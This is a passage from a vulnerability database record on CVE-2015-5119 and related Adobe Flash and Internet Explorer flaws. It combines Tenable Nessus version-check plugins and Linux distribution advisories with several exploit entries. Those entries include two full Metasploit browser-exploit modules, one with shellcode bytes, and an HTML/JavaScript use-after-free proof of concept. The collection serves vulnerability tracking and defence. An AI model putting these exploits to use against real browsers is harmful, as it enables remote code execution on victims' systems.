script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:31", "bulletinFamily": "scanner", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is equal or prior to version 18.0.0.194. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "modified": "2018-07-14T00:00:00", "id": "MACOSX_FLASH_PLAYER_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84644", "published": "2015-07-09T00:00:00", "title": "Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16) (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84644);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16) (Mac OS X)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 18.0.0.194. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 18.0.0.203 or later.\n\nAlternatively, Adobe has made version 13.0.0.302 available for those\ninstallations that cannot be upgraded to 18.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"18.0.0.194\";\n fix = \"18.0.0.203\";\n}\nelse\n{\n cutoff_version = \"13.0.0.296\";\n fix = \"13.0.0.302\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-05T03:19:42", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. This Metasploit module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.", "modified": "2015-07-08T00:00:00", "published": "2015-07-08T00:00:00", "id": "1337DAY-ID-23842", "href": "https://0day.today/exploit/description/23842", "type": "zdt", "title": "Adobe Flash Player ByteArray Use After Free Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\r\n discovered by Hacking Team and made public on its July 2015 data leak, was\r\n described as an Use After Free while handling ByteArray objects. This module has\r\n been tested successfully on:\r\n\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Someone from HackingTeam\r\n 'juan vazquez', # msf module\r\n 'sinn3r' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-5119'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\r\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81 ||\r\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\r\n os =~ OperatingSystems::Match::WINDOWS_XP\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n # Note: Chrome might be vague about the version.\r\n # Instead of 18.0.0.203, it just says 18.0\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 06 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23842"}, {"lastseen": "2018-04-08T14:23:17", "bulletinFamily": "exploit", "description": "This Metasploit module exploits an use after free condition on Internet Explorer as used in the wild on the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to bypass ASLR and finally DEP.", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "id": "1337DAY-ID-22151", "href": "https://0day.today/exploit/description/22151", "type": "zdt", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Internet Explorer as used in the wild\r\n on the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\r\n bypass ASLR and finally DEP.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and Exploit in the wild\r\n 'Jean-Jamil Khalife', # Exploit\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-0322' ],\r\n [ 'MSB', 'MS14-012' ],\r\n [ 'BID', '65551' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],\r\n [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 960,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN,\r\n :ua_name => Msf::HttpClients::IE,\r\n :ua_ver => '10.0',\r\n :mshtml_build => lambda { |ver| ver.to_i < 16843 },\r\n :flash => /^12\\./\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2014\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def stack_adjust\r\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n \r\n adjust\r\n end\r\n \r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" )\r\n fd = ::File.open( path, \"rb\" )\r\n swf = fd.read(fd.stat.size)\r\n fd.close\r\n return swf\r\n end\r\n \r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n print_status(\"Request: #{request.uri}\")\r\n \r\n if request.uri =~ /\\.swf$/\r\n print_status(\"Sending SWF...\")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n super\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n \r\n flash_payload = \"\"\r\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\r\n flash_payload << \"0x#{i.to_s(16)},\"\r\n end\r\n flash_payload.gsub!(/,$/, \"\")\r\n \r\n html_template = %Q|\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n \r\n <script>\r\n \r\n var g_arr = [];\r\n var arrLen = 0x250;\r\n \r\n function dword2data(dword)\r\n {\r\n var d = Number(dword).toString(16);\r\n while (d.length < 8)\r\n d = '0' + d;\r\n \r\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n }\r\n \r\n function eXpl()\r\n {\r\n var a=0;\r\n \r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n \r\n var b = dword2data(0x19fffff3);\r\n \r\n while (b.length < 0x360) {\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n \r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n try{\r\n this.outerHTML=this.outerHTML\r\n } catch(e){\r\n \r\n }\r\n \r\n CollectGarbage();\r\n \r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n }\r\n \r\n function trigger()\r\n {\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n }\r\n \r\n </script>\r\n <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\">\r\n </embed>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html_template, binding()\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22151"}, {"lastseen": "2018-01-04T13:03:28", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2014-04-15T00:00:00", "published": "2014-04-15T00:00:00", "id": "1337DAY-ID-22145", "href": "https://0day.today/exploit/description/22145", "type": "zdt", "title": "Internet Explorer 10 & Adobe Flash Player (12.0.0.70, 12.0.0.77) - CMarkup Use-After-Free", "sourceData": "<!--\r\n MS14-012 Internet Explorer CMarkup Use-After-Free\r\n Vendor Homepage: http://www.microsoft.com\r\n Version: IE 10\r\n Date: 2014-03-31\r\n Exploit Author: Jean-Jamil Khalife\r\n Tested on: Windows 7 SP1 x64 (fr, en)\r\n Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)\r\n Home: http://www.hdwsec.fr\r\n Blog : http://www.hdwsec.fr/blog/\r\n MS14-012 / CVE-2014-0322\r\n \r\n Generation:\r\n c:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf\r\n \r\n E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as\r\n \r\n-->\r\n \r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n \r\n<script>\r\n \r\nvar g_arr = [];\r\nvar arrLen = 0x250;\r\n \r\nfunction dword2data(dword)\r\n{\r\n var d = Number(dword).toString(16);\r\n while (d.length < 8)\r\n d = '0' + d;\r\n \r\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n}\r\n \r\nfunction eXpl()\r\n{\r\n var a=0;\r\n \r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n \r\n // Build a new object\r\n var b = dword2data(0x19fffff3);\r\n while (b.length < 0x360)\r\n {\r\n // mov eax,dword ptr [esi+98h]\r\n // ...\r\n // mov eax,dword ptr [eax+8]\r\n // and dword ptr [eax+2F0h],0FFFFFFBFh\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n // mov ecx,dword ptr [edx+94h]\r\n // mov eax,dword ptr [ecx+0Ch]\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n // mov eax,dword ptr [edx+15Ch]\r\n // mov ecx,dword ptr [eax+edx*8]\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n \r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n // trigger\r\n try{\r\n this.outerHTML=this.outerHTML\r\n }\r\n catch(e){\r\n \r\n }\r\n \r\n CollectGarbage();\r\n \r\n // Replace freed object\r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n}\r\n \r\n// Trigger the vulnerability\r\nfunction trigger()\r\n{\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n}\r\n \r\n \r\n \r\n</script>\r\n<embed src=AsXploit.swf width=\"10\" height=\"10\"></embed>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22145"}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "bulletinFamily": "unix", "description": "A critical vulnerability (use-after-free in the AS3 ByteArray class) has\nbeen identified in Adobe Flash Player 18.0.0.194 and earlier versions\nfor Windows, Macintosh and Linux. Successful exploitation could cause a\ncrash and potentially allow an attacker to take control of the affected\nsystem.\n\nAdobe is aware of reports that an exploit targeting this vulnerability\nhas been published publicly.", "modified": "2015-07-08T00:00:00", "published": "2015-07-08T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-July/000361.html", "id": "ASA-201507-7", "title": "flashplugin: remote code execution", "type": "archlinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:02:17", "bulletinFamily": "unix", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to\n take over the system (bsc#937339).\n\n", "modified": "2015-07-08T22:07:55", "published": "2015-07-08T22:07:55", "id": "OPENSUSE-SU-2015:1210-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00016.html", "title": "Security update for flash-player (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:40", "bulletinFamily": "unix", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to\n take over the system (bsc#937339).\n\n", "modified": "2015-07-08T17:08:40", "published": "2015-07-08T17:08:40", "id": "OPENSUSE-SU-2015:1207-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00015.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: 